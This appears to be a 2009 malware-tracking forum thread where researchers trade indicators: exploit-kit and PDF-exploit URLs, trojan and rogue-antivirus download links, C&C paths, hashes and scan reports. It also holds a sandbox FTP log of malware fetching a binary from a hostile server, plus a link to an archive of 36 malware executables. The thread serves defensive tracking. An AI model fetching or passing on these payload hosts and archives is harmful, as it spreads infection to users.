Other files usually used by this rogue family [browser hijacker, Fake BSOD..]
http://download.best-av1.info/en/PE/N1.CAB
http://download.best-av1.info/en/PE/QWProtect.dll
http://download.best-av1.info/en/PE/svchost.exe
-
pdf/flash exploit
truff.biz/myy/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=485a23bf02f4721e4170bffe1dfc0903&t=1239118663&type=js
trojan
http://truff.biz/myy/load.php?id=4http://www.virustotal.com/analisis/78ca3e1b17cf6b3499d9714cf2cdda15
-
seems like Zeus in the end:
http://update3.cn/spl111/index.phphttp://wepawet.iseclab.org/view.php?hash=13b9fbbd568f6bbba6bfb2088e20610d&t=1239121445&type=js
-
pdf exploit leading to zeus infection:
http://233242.info/1/include/spl.php
http://233242.info/1/load.phphttp://www.virustotal.com/analisis/d6fcdb78ed428bf52f47e6fb75bed6fc
http://wepawet.iseclab.org/view.php?hash=b03cbc6d02dc98d6b9527060c8a7ebe9&t=1239125074&type=js
now this exploit isn't working good for me(if anyone else could check it ,would be nice)
should start here but gave me some kind of error:
http://sh-hostz9.net/1/index.phphttp://wepawet.iseclab.org/view.php?hash=20c7f173f3a113538dea1ba392d13305&t=1239121977&type=js
Iframes to :
http://sh-hostz9.net/1/pdf.phphttp://wepawet.iseclab.org/view.php?hash=3c236eaec1299ed3c633aed33ae1736e&t=1239122033&type=js
and
http://sh-hostz9.net/1/vparivatel.php (from here it gives you a screen to do some update)
http://wepawet.iseclab.org/view.php?hash=9a310342e3d2202d661d75be9333b869&t=1239131443&type=js
finally leads to the trojan:
http://sh-hostz9.net/1/load.php
Hamm now its starting from :
http://sh-hostz9.net/2/index.phphttp://wepawet.iseclab.org/view.php?hash=f883649411359a991e9f55e2cc541cc8&t=1239132145&type=js
leading also to:
http://sh-hostz9.net/2/pdf.php
lol changed after 30 min or so ~.~
-
now this exploit isn't working good for me(if anyone else could check it ,would be nice)
Both of them are in the same ip address,220.196.59.26,meaning there's a good chance that if you first visited one of them first...
And the rest of the domains hosted there aren't much different,heh...but i didn't manually verified them,merely googled about them.
Earlier ips in the same netblock there host malicious domains from what i see...
will attempt digging them tomorrow though,need some sleep now ;-)
hxxp://goshak.biz/my/index.php
-
now this exploit isn't working good for me(if anyone else could check it ,would be nice)
Both of them are in the same ip address,220.196.59.26,meaning there's a good chance that if you first visited one of them first...
And the rest of the domains hosted there aren't much different,heh...but i didn't manually verified them,merely googled about them.
Earlier ips in the same netblock there host malicious domains from what i see...
will attempt digging them tomorrow though,need some sleep now ;-)
hxxp://goshak.biz/my/index.php
changed my ip between trys
anyway its not that it recognize my ip or something,it just gives some error saying "file does not begin with %pdf " or something like that
also another one on that IP:
http://volimir.biz/my/index.phphttp://wepawet.iseclab.org/view.php?hash=57cae50b99f2591b0612eba32de4a67b&t=1239134249&type=js
the pdf exploit itself is at:(wepawet didnt analyze it)
http://volimir.biz/my/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=22ae140b9b2f549caffb7328bb4dbf0c&t=1239134421&type=js
-
Oh,the .pdf file itself you meant?I'll check it tomorrow,my mind isn't working properly at the moment,plus i'm not in front of a vm...i need to sleep.
Last one for tonight - exploring the rest of this ip,is..."left as an excercise for the reader" :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
-
Forget where these dingleberries fell from... ???
174.133.72.250/p0324/2.0/td.bin?bb021908657356
174.133.73.178/p0324/2.0/d.bin?bb021908154292
75.125.239.42/p0324/2.0/so.bin?bb021908350659
dglcxlcfmk.net/bbsuper0.php
dglcxlcfmk.net/bbsuper1.php
dglcxlcfmk.net/bbsuper2.php
dglcxlcfmk.net/bbsuper3.php
dglcxlcfmk.net/uniq.php?id=1693466186&p=0
zief.pl/wr.exe
install.8800.org/files/5.exe
install.8800.org/files/adx.exe
install.8800.org/files/ipk.exe
install.8800.org/files/zha.exe
stanishev.com/1/nfr.exe
stanishev.com/1/pp.06.exe
xz.wanggui.com/mem322.exe
-
Oh,the .pdf file itself you meant?I'll check it tomorrow,my mind isn't working properly at the moment,plus i'm not in front of a vm...i need to sleep.
Last one for tonight - exploring the rest of this ip,is..."left as an excercise for the reader" :D
http://www.bfk.de/bfk_dnslogger.html?query=220.196.59.17#result
hxxp://xdwlnbqsdsph5pc8rz81.cn/s_t.php
nifty!
sets up an ftp and AT jobs to run every 15 minutes, etal
http://wepawet.iseclab.org/view.php?hash=19d22d89420a09c6d59b1d032f19de94&t=1239135714&type=js
ftp> open 122.224.9.221
Connected to 122.224.9.221.
220 www.host.com FTP server (Version 6.00LS) ready.
500 AUTH GSSAPI: command not understood.
500 AUTH KERBEROS_V4: command not understood.
KERBEROS_V4 rejected as an authentication type
Name (122.224.9.221:sandbox): qqq
331 Password required for qqq.
Password:
230 User qqq logged in, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get calc.exe
local: calc.exe remote: calc.exe
227 Entering Passive Mode (122,224,9,221,202,67)
150 Opening BINARY mode data connection for 'calc.exe' (245248 bytes).
226 Transfer complete.
245248 bytes received in 2.7 seconds (89 Kbytes/s)
ftp> quit
221 Goodbye.
$ mv calc.exe oddyoy.exe
http://www.malwaredomainlist.com/mdl.php?search=122.224.9&colsearch=All&quantity=50
http://www.virustotal.com/analisis/b80457dd723351fa2a2ff176bcfe8e8b
http://anubis.iseclab.org/?action=result&task_id=141ccbbd213e2be145dd0d57fc0a2d48e
http://13-2005-search.com/new1.php
<A HREF=http://xxxhardpornteenxxx.com
><BR><BR><BR><BR><BR><BR><BR><BR><BR><CENTER><FONT SIZE=+6>ENTER</FONT></A>
$ dig 13-2005-search.com +short
220.196.59.1
Busy little network
http://www.malwaredomainlist.com/mdl.php?search=220.196.59&colsearch=All&quantity=50
-
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
-
The rest from the same ip mentioned yesterday...pretty easy task:
hxxp://dihbgbwqryuolfbebgme.cn/s_t.php
hxxp://dcz9ubei212vp3nrca5i.cn/s_t.php
hxxp://znchygdrmelzejjvofji.cn/s_t.php
hxxp://virevpcklvlrxjcqxtij.cn/s_t.php
hxxp://xbfnyukgdoqrjrsfmcdm.cn/s_t.php
hxxp://qjiv7qj4irh2f1o2v8sm.cn/s_t.php
hxxp://1zs0ewvqcget52rl1z1n.cn/s_t.php
hxxp://lufwhtelkadvrtaukqjo.cn/s_t.php
hxxp://ddvrrflabpqcuoaexpwp.cn/s_t.php
hxxp://lmempodfzrqqkteyupar.cn/s_t.php
hxxp://zjjrrhhuokjxgmulisxs.cn/s_t.php
hxxp://tckeblkiumuhysrwqlev.cn/s_t.php
hxxp://egntxselsaossawilurx.cn/s_t.php
hxxp://hsyzpbavkojdqclhnoqz.cn/s_t.php
==================
hxxp://msvcp70.biz/e514.gif
hxxp://msvcp70.biz/e536.gif
hxxp://msvcp70.biz/e509.gif
hxxp://msvcp50.biz/e514.gif
hxxp://msvcp50.biz/e536.gif
hxxp://msvcp50.biz/e509.gif
hxxp://yourguardon.com/
Iframes to goshak.biz listed earlier...
==================
ftp> open 122.224.9.221
Connected to 122.224.9.221.
............
Here's the rest of domains there... :)
http://www.bfk.de/bfk_dnslogger.html?query=122.224.9.221#result
hxxp://wllvvkjknh.cn/md/index.php
hxxp://woqyymmptn.cn/md/index.php
hxxp://ozimzikjun.cn/md/index.php
hxxp://zusojbktvo.cn/md/index.php
hxxp://enjnzdfmts.cn/md/index.php
hxxp://fxlbubmkfs.cn/md/index.php
hxxp://pxciiruurw.cn/md/index.php
As for the one not listed above,miss-office-2009.com namely...
seems we've got a pretty hardcore spammer here,so...let's vote for him ;-)
http://www.google.com/search?q=miss-office-2009.com
-
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
yeaa that what i was talking about,kept getting this error though in the end it did redirect me to the other iframe there at vparivatel.php
-
exploits/trojan
www.besplatnoe-porno.info/downloads/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=937bb224a8eb2fd48d1d812a867c9623&t=1239190412&type=js
http://www.virustotal.com/analisis/99a1a9d2003b23212842cd22ee90c129 3/40
-
exploits
m.winxyz.comhttp://wepawet.iseclab.org/view.php?hash=d66445fca10663d693af2f98cd2d398c&t=1239171377&type=js
http://winxyz.com/win/j.exehttp://www.virustotal.com/analisis/ce445dadf7062fd70787035dbca77edf 13/40
http://winzxm.com/win/u.exehttp://www.virustotal.com/analisis/e06dfabe4a1a7fabf065604678b24b9c 11/39
-
TDSS variant:
http://www.virustotal.com/analisis/f24fe6a2671b58376efafef6b068254c
hxxp://traffbox.com/in.cgi?6
hxxp://goscandata.com/?uid=12404
hxxp://scan7live.com/?uid=12404
hxxp://scan7live.com/download/install.php
Koobface variant:
http://www.virustotal.com/analisis/0d66a352aa6c6f7579fae43a1aba4c15
hxxp://traffbox.com/in.cgi?3
hxxp://hqviewworldmy1.com/view/1/1222/1/2
hxxp://hqviewworldmy1.com/download/1/1222/1/2
hxxp://hqviewworldmy1.com/software/c2fb59fa16/12221/1/2.exe
Notice that traffbox.com above redirects either to tdss or koobface,depending on parameters passed...
Now,same type Koobface variant as above,different hash though:
http://www.virustotal.com/analisis/2104a7d2b8c8a3fd2f84128d90c84fe9
hxxp://hqviewworldmy1.com/software/c2fb59fa16/10005/1/Setup.exe
========================
hxxp://welovesandi.com/?cmpid=
hxxp://crustat.com/ts/in.cgi?gen&se=oth&ur=1&hxxp_REFERER=wel-cmpid%3D
hxxp://www.scanspywareonline.com/online-scan.html?ewmid=231&pwebmid=gen&rejurl=hxxp://pnfzetnax.net/asw/gen/
hxxp://pnfzetnax.net/asw/gen/
hxxp://truconv.com/?a=125&s=gen-asw
hxxp://top-name.cn/in.cgi?default&a=ks125&s=gen-asw
hxxp://total-virusprotection.com/xpprot/7/?a=ks125&s=gen-asw&z=
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
--->
hxxp://setup.total-virusprotection.com/ -> Open dir... ;-)
--->
The executables there... (md5 dupes not listed)
hxxp://setup.total-virusprotection.com/total-malwareprotection.com/1.0.11.0/updatexpvps.exe
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe.1
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
Play around with crustat.com's parameters above,it generates numerous nifty links...
========================
Plus another open dir with fake AVs...have fun:
hxxp://download.pcantimalwaresolution.com/
hxxp://offer-provider.com/srm/adv/142/
hxxp://dwnld.offer-provider.com/secure/940907dc34c7bed5e75f1e517b2b3a42/49dd612d/srm/srm_free_setup.exe
hxxp://infracleaner.in/download.php?affid=02935
hxxp://onlinebrandsecurity.com/download.php?affid=17503
-
Direct link to the executable in dwnld.offer-provider.com above,seems to have changed since yesterday...
hxxp://dwnld.offer-provider.com/secure/85f2be819efd8db13b4fab89c8a1d2db/49dde7f1/srm/srm_free_setup.exe
Plus,it's open dir,for the time being...
hxxp://dwnld.offer-provider.com/
36 unique .exes there - here are the md5 checksums...
0651b7a4652b62c9bb74493c7440063d
2a5e21896b3043558a44f578a3b4cfea
2f590df32718d03c1c2a8fbeec715cac
2f7a9243cf4179157e382c39b1b8d1ef
31111c18393fcc7a08f7992aedc750ec
3228f756e74b05325beec3c6beeb2dea
3345b80c425dc6affe139ace94fee877
347271c8d9dc43d19b6c96708da08546
4795a9ae8a745c954f7a49944b8383a8
5a9087a4ef2dbf7f9e5a98226e94d8ff
5fb2e122b013aaf49f53502fd137e868
6737ff1d0c98962b515875283458095d
6890de6ce038b5d591aa14533a55292e
75b367bd2754b7dabfe2d1fd9bed789f
7a0051905effe054878aff73e4d01625
84f37f3f8f5434b8e6dad753bea717e9
8cfa3151df73debd3cb9b1bde978239c
9523d691f47fb8eb2457d2dbb3baed29
991c4f16c2f6fdb1712fccb573f6bfaa
9a8ecb72c0ca39145e0a6913f029abad
9b584cad38175a050bcd50805b12417e
a40e8cb47af24ef91023d4c078ad77ac
af862463f039fdc8b53e06406de73e67
b1705495d54f8c8f2f283c4886efb081
bb734c355149c3eed3389d309ea13fb1
c3328da0fa70305efeca816d735fca01
c3ef149dcfc5b3ca9da2578921de0007
c4a362df8a92650f6af41de9c733019a
c96bab9c4c7838b5eab3462e34ad8ec1
d7edd052b5363c57777addb72e8ae47c
d889b0e868832fd4ee7ba868656a6827
d9195a978f8cf2ba213471f4d3f484c3
dd18136c665be386bd02476e523df04e
e9cfd70907cf607b6fe7e92557989e20
f0afe3b1d0d4536cede447ea59053071
feed65765e05fcf542ff797147a88f8f
Here they are archived in .7z format ...78mb approximately:
http://www.megaupload.com/?d=Y33LVTZH
-
Rogue:
scanner.rapid-antivir-2009.com/35/?advid=1694&ref=0&p=1000000000
soft-traffic.com
Redirect to rogue:
rd-point.net/go.php?id=1188
Exploit/trojan:
http://projectns.biz/sploits/pdf.php?id=2http://wepawet.iseclab.org/view.php?hash=46aa9abb1ac32cdd3134f0230694fc1b&t=1239188557&type=js
Exploit/trojan:
vas4k.cn/pabl/http://wepawet.iseclab.org/view.php?hash=f39bbd62bab727dc7c075547dd3df249&t=1239191102&type=js
trojan:
http://secondgate.ru/77/load.php?id=2http://www.virustotal.com/analisis/4c5fd3e65565e2b33c68c855a58de0ca
trojan:
http://bankitrade.com/exp/l.php?b=2&s=djdakhttp://www.virustotal.com/analisis/7070fe304677bbda85dfd8a6970ab46f
-
pdf/flash exploit
x.lousecn.cnhttp://wepawet.cs.ucsb.edu/view.php?hash=bc0b5c2d562ee175849da928de2727b4&t=1239369858&type=js
http://x.lousecn.cn/load.php?id=2http://virscan.org/report/b0abe06d8536b4abe35c6beb9079a5b6.html 4/37
-
msn-gallery.us/f.jpghttp://virscan.org/report/6735f8decd6ffb129052f297220957c3.html 0/37
-
C&C server:
hxxp://moneystyle.com.cn/bmngr/controller.php?action=bot&entity_list=
hxxp://www.new-mrcash.net/images/x_01.jpg
Seems like a failed attempt at using Thinstall to me,anyway...
http://anubis.iseclab.org/?action=result&task_id=13ee47e6969787c64dd38f52f3e9842ee&format=html
http://www.virustotal.com/analisis/34a6262329fda4fb398c57de90201a7a
hxxp://www.new-mrcash.net/images/win_04.jpg
http://www.virustotal.com/analisis/b188a358f58d5b8a0074f81fc79a0f25
-
Exploit
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php
-
Exploit
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php
all lead to
trojan Hiloti
67.215.246.138/a12/aff_12.exe?u=i_7_0&spl=4http://virscan.org/report/e01f5e00ab1a5916117edaf06bdfd4f1.html 4/37
-
Found the whole list not sure if some of them are already included or not.
hxxp://193.138.172.15/salo/?16de305069114a106409128eb3bb985b8d4d98674d1376589cbccfd886874a6072e088f250fa24f1270c05764cfe398e75b8936c7cd308dcfab00d2d5beafff0 DIRECT/193.138.172.15
hxxp://193.138.172.15/salo/?27a2f14df1d2659997c6434cebe6df547dff29131b9812ee9e49a3402a2c9a0cd6fc3e067512f7802e3b072473443089755efbe378162268855fb15dd41ddd1b DIRECT/193.138.172.15
hxxp://193.200.255.19/%7Etimchenko/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://194.165.5.20/sp/7.pdf DIRECT/194.165.5.20
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/210.83.85.100
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/213.182.197.229
hxxp://202.73.57.6/tomi/?1643bf49f40997de68d1f717b843a34e44612930cf3f24bc08ef9b738eb345962032326f97041b59e6df8f3d76d59a24c4f6a58f05e382fdab2fd26adc9ff32e DIRECT/202.73.57.6
hxxp://78.129.166.5/%7Exqz/sp/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.93.80 DIRECT/78.129.166.5
hxxp://7ioi.biz/fo/spl/pdf.pdf DIRECT/213.182.197.236
hxxp://94.247.2.122/us.pdf DIRECT/94.247.2.122
hxxp://94.247.2.195/news/?id=2 DIRECT/94.247.2.195
hxxp://96.0.13.1/jms/sploits/test.pdf DIRECT/96.0.13.1
hxxp://alibaster-lab.com/ku4ka/?06f069b34f8391ebb6b30bea77dd544a00c51b31052c162535b1651701bdbc8d795bfdad269883f3bcffd34481d4b002aaf7794493ec9d458a16526e53f4ec55 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?7d175e916943129c063df2755092f4b03b2adbfd3e07325549fca0a004193bfa99ae001fc45d8818ca91c9481393fed02d8b28ebdae25d1f20086790abf0268b DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?9818afdf8dbc7d26f9aabec45e66429d94873736ab28091bbb95c1235df09ff235048abe2ac286d7851421c916604e1e59f310a08ccf84738e202c7f65937144 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a57de90806f02a6a9ba60c5bac2c4d51ec994e0838e76879965e0c6e13f3c9d53ecd0a3c929c1e690a2265ad262cf425f67d010dae21fceee3b6936e2ad19367 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a60c2ced642a47a04cd3634efa5b32f6c37a5cb5d6b7d1f5a622043c740820680b775ce5864eda801bfbaf4e9103274485bf9850fd25fab793128ef89b627ff9 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?a6904e4daaa45b62e2fa3ae37946f807ac9d22f59134e91022bae9cc14af2199bbf44dcb587cc57da04cede8328127ac499f78642beab317ff768ade8ee96872 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?aa31ae54c455d5239ce8bb7e052ccede8faec050044695efb05e8996930cf3e12bef660d5aa4e84e3cf9ccd70e801a257bb73f2dc33d10dd91cbbb0dd183a26c DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?b36ae95f732ef6b87311f229bdf95b0285a346a85f964afc81c8f60a5c48a26bb4e4d9b2317ad66fe4553096ff7127ce21ae1e0ec034949ab48a4e7329ead9ae DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?bf18df2f1a8515e59f6c5f41f9bd781cd913576ea4528b5fbc5b44d826febf794b8169fd7255691b7e6049c25f476480bee770e5b4d7a378c08c9228f9331592 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?c6b768850be96601249400e780d182e2144a43bb61f65f21cd570e567ccad8becf5dad7a9263b79962f824df94ca90c7a1e3d7efc00ea82fde510bcbf9a907c2 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?d8a5c5296b9ac376636d2c4c549f59ee6c4d990aba09bc735e122abcc14cc8ca891a5c0a7d44cd5fcaa100f0beac0da93097230c3f47c8e9ef3193e393c9cdd3 DIRECT/195.216.175.114
hxxp://alibaster-lab.com/ku4ka/?ecde4e68294d2139b61c47fa902a47fff0a30d57e062e38694ff262a2fe762dee88d5243393bf613dd04d32fb97cd38aa3de05223e7192b83fbbdfa870aa5a68 DIRECT/195.216.175.114
hxxp://bankitrade.com/exp/s/i.pdf DIRECT/95.129.145.242
hxxp://basesrv3.net/bin2/pdf.php DIRECT/91.212.41.90
hxxp://basesrv3.net/bin/pdf.php DIRECT/91.212.41.90
hxxp://basesrv.net/bin/pdf.php DIRECT/91.212.41.90
hxxp://bdsm-movies.info/33/cache/readme.pdf DIRECT/216.195.40.120
hxxp://bestyourown.cn/sploits/pdf.php?id=2 DIRECT/64.86.16.8
hxxp://bigtopescorts.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://blufda.com/c94mee22/pdf.exp.php DIRECT/78.26.179.66
hxxp://blufda.com/rro69s6x/pdf.exp.php DIRECT/78.26.179.66
hxxp://bytenetcom.cn/nuc/spl/pdf.pdf DIRECT/91.203.4.106
hxxp://casinoslotbet.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://checkantiddos.info/f/spl/pdf.pdf DIRECT/213.182.197.229
hxxp://darkslim.cn/1/cache/doc.pdf DIRECT/118.126.4.86
hxxp://dolpassgiven.ru/3/pdf.php DIRECT/91.212.41.209
hxxp://exploitbla.biz/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C83.202.72.17 DIRECT/78.129.166.5
hxxp://famajormusic.ru/jjkj/pdf.php DIRECT/91.212.41.209
hxxp://firstgate.ru/33/cache/readme.pdf DIRECT/216.195.40.117
hxxp://ghrgt.hostindianet.com/cache/readme.pdf DIRECT/94.247.3.151
hxxp://hyperliteautoservices.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://illegaltopcounters.ru/1/pdf.php DIRECT/95.129.144.13
hxxp://ispacemac.ru/1/pdf.php DIRECT/91.212.41.209
hxxp://kovsutap.cn/na/pdf.php DIRECT/91.212.41.102
hxxp://krona98.biz/opi/cache/readme.pdf DIRECT/91.203.4.59
hxxp://letomerin.cn/x0/spl/pdf.pdf DIRECT/213.182.197.235
hxxp://letomerin.cn/x0/spl/pdf.pdf DIRECT/78.109.25.216
hxxp://liteautofinestsite.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://liteautorepair.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litebest.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litedownloadfinest.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://litehitscar.cn/cache/readme.pdf DIRECT/94.247.3.151
hxxp://myfucking-pussy.com/tyrek/?08af957e26feebebaeb788d5cd4e0bce59d419a38c684b6284399e6f4266ecf617b7cbbc629c1ae6dcbc5d1308b8f7a0f4bc729239e9bc619e35869086f85d91 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2200182aeb20dafdb47df1ddb4c819a8c4fbb5aa86c643a6ab01604ed81d4bdc22b4f578326e3fb577f9f18ddef1629c91ee8f8100f8d97b6298ff1ccb758022 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?26b5416cc91f58dc7c02a0fe304439184eb065a196467bf930f38148f19b82399f69437a2fef5aee53c9f38630d78d58dbf9c126b99969cd37644c624b2bf7e9 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2b0ea2e40df93fd74b3090538c69990b533e402b6d40de4e1bd59f11e1c0b5a5539ea0e297dd79c0da7080ab1b9a997adb28b5a5fb1bfda4c9e574f158cae17b DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2c93b5539de28316012cf3c43ae2e0899193b20165672972af0703842b882c4cd653d6678404ec1b9b9e34794de15e047ebc488e31572e5a208bad33b0509eea DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?2ef099bd359071ac46865dd01cdbd5fb8119b1a6c7b40e53560e37666231a2adb2faecf9b8751c19afa607c470c6feb11409168ffd87adb4066f0e79b0eb5746 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?45215b094440c6bdbc3a79e93561bca421fa2609fa75023f6083d23c1484dec389155714563636e200f5f3e5f1756b36c791e52c8e9da926310f42bc2e912727 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?4868406547514fc3c03e2c2cf7c3ecabbc6cc12a3b518a186c5837cf5297b9673e5444e84d888159e02754192054464210434a34f3b3c879035fc60745eeb815 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?595774b8b2f4672ba31f4ead701dc4ad4209ecec783cc7183ae504c40187203e7d0e66a1ee4c846d45573cda11fe0cc711a9b87f43a4b427f6f85e91f1eb30e9 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?626a25588a38f82452d5822340b84679b2dffea91b01be8f36a51363dccab07749a2e27780f195671c4e4c15056cf17192b17c4760d0874dbd00efec356c4497 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?7095d071692e927060e60d0bc637cec2be3223e6fe11ee05f10e23cbc4fc5bee921e6cf5579ac960235f7dc64eb81ca7bbd88c635afb8864c6c8f945e4e7d302 DIRECT/72.233.79.18
hxxp://myfucking-pussy.com/tyrek/?7482db71fcfa7db49e23e1553c2b433b9f4da51e9b2fe2460a20c43117aa8662ceeb0e844f7451a136dd122114b89a86eac384e28ba1a3fac6547a215327eebc DIRECT/72.233.79.18
hxxp://p0rn-movies.com/77/cache/readme.pdf DIRECT/91.212.41.102
hxxp://paksusic.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://projectns.biz/sploits/pdf.php?id=2 DIRECT/91.206.226.41
hxxp://qicdator.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://rifnasax.cn/nuc/spl/pdf.pdf DIRECT/91.212.65.7
hxxp://secondgate.ru/77/cache/readme.pdf DIRECT/216.195.56.149
hxxp://seotraff.biz/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://siplank.com/qqp/pdf.php DIRECT/209.44.126.62
hxxp://stats-analytics.cn/lera/?2b4a9572ff7310be2b53663701857cdb29c08df5d86020af263785aa02c9158b1c1fcbc6d92b1199afcc514ab5210c2b67a1f94d844e344d0cac9e3711d3cf64 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?2c77f0edd917158b3213735a7a8b5fc01e689fc9e7982a67ce485344c701c57ff78f4a985f1d65c06361192592d28593bbce8be327029114a997a36624fc120b DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?30d68f7627e7966b6b53f697876d432d80f4297b61f2528b4c5d7d9d3e9fac08113794f5db25cc9e8f0b816016d5ab17035d91547bfdefab078d6b847a079da6 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?3cca334cbb795f89bf718e1b994f133610a4caddf301ea4220113c863f59cca50cdefda9a607cec73cbf691d37b9e15f4ad50c00d39ec521ca6b02cf3dabe305 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?5b18cdb699e3855f2dc0c0b4fcced806470f26ba806317ea1decffd3ac05e7140c556f72cc6ad7a3bbccb04aeab467986801367498c4b2815f4176af31da87af DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?670bb9759520482dc9428639faa3b88e917c31ed3c72be4e6ae6822f187aa14e6b75d689c9a89b5950f6501a98faa5693af640753dcffcdbd84d96e298b03dbc DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?6c4edbbde1079a141f222f317462eae4257d6b70b2bb4cb873bf3fd8bc03ab5d0c41e68c4e66d3ab6a790e97d6c05e9367eec5ee4e5c93e8911352c50f71a5e3 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?924790525309dec3e79471a120b3d4e58874eb7e0b7986865f637467b023b120edb1f0c242159c63b2e685d5c3029c5f6a0e633b9d11191decaf9f05e5129b03 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?c4208aeddcbdc2559b016827733b8b11cffc038505fe08852fca694c7fd06ef0cd56b0a69a69a70a6816ac602182e3f0ebf5a77ab0775bdd9ddef43df7dcd322 DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?c771c57144bf5721b1e30df8f9790430abec4c730132c06965d939dd3f431a68717a6336bcf6c44e6fb52ebd63cf275d4022cd59321f6b818900a06c04ac573a DIRECT/94.232.248.51
hxxp://stats-analytics.cn/lera/?cdc72a9e29fa2202c913c84c28672f25413aae316898ed78cfc12f85e970b18e28f6c53f345f1cb5c11b342fc2df80c0c0c1ea15a8d210bade54ad00d0c48061 DIRECT/94.232.248.51
hxxp://time-for-mumpreneurs.site90.net/images/acs.php DIRECT/64.235.47.65
hxxp://tochtonenado.com/yes/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.231.245 DIRECT/95.129.144.228
hxxp://tochtonenado.com/yes/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.80.121 DIRECT/95.129.144.228
hxxp://tusset.de/z/pdf.php?t=4%20&znk@%20l=700 DIRECT/88.84.137.164
hxxp://vestelia.com/qqp/pdf.php DIRECT/209.44.126.62
hxxp://www.murka-best.com/include/spl.php?do=foxit DIRECT/122.224.5.189
All of the above are pdf/java exploits.
-
Found the whole list not sure if some of them are already included or not.
Most of those urls have already been at the list.
It looks like Malekal's exploit list.
-
193.111.244.21
Exploit (util.printf) - Wepawet (http://wepawet.iseclab.org/view.php?hash=11d02f5e15a36bdf8ff9a7f8779b5929&t=1239491654&type=js)
hxxp://onlinepharmacy4you.org/65/iepdf.php?f=new
Trojan
hxxp://onlinepharmacy4you.org/65/load.php
hxxp://www.kandidatov.net/1/p.exe
VirusTotal (http://www.virustotal.com/analisis/037af797be509dc3da1380fdf34df1c5) 35/40 (87.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1b3cce6a0deb513e4fdc83a2990e917ce)
-
Zbot
finik.us/live/load.php?e=1http://www.virustotal.com/analisis/f081994ac023069ebe47ddd949adc743
Rogue:
http://www.chorussoft.com/install.exehttp://www.virustotal.com/analisis/a06a11e5549f88f483d564c2582ccc97
This IP is full of rogue:
http://www.bfk.de/bfk_dnslogger_en.html?query=64.191.12.38#result
the ones that aren't in MDL
ms-antispyware2009.com
pro-antispyware2009.com
http://files.load-antivir-pro-pc.com/release/setup.exe
totalantispyware2009.com
totalantispyware.com
system-cleanerpro.com
syscleanerpro.com
totalantispyware.net
other Rogue:
http://ugh-softwares.com/promo.exe
http://gdfshgfh.com/promo.exe
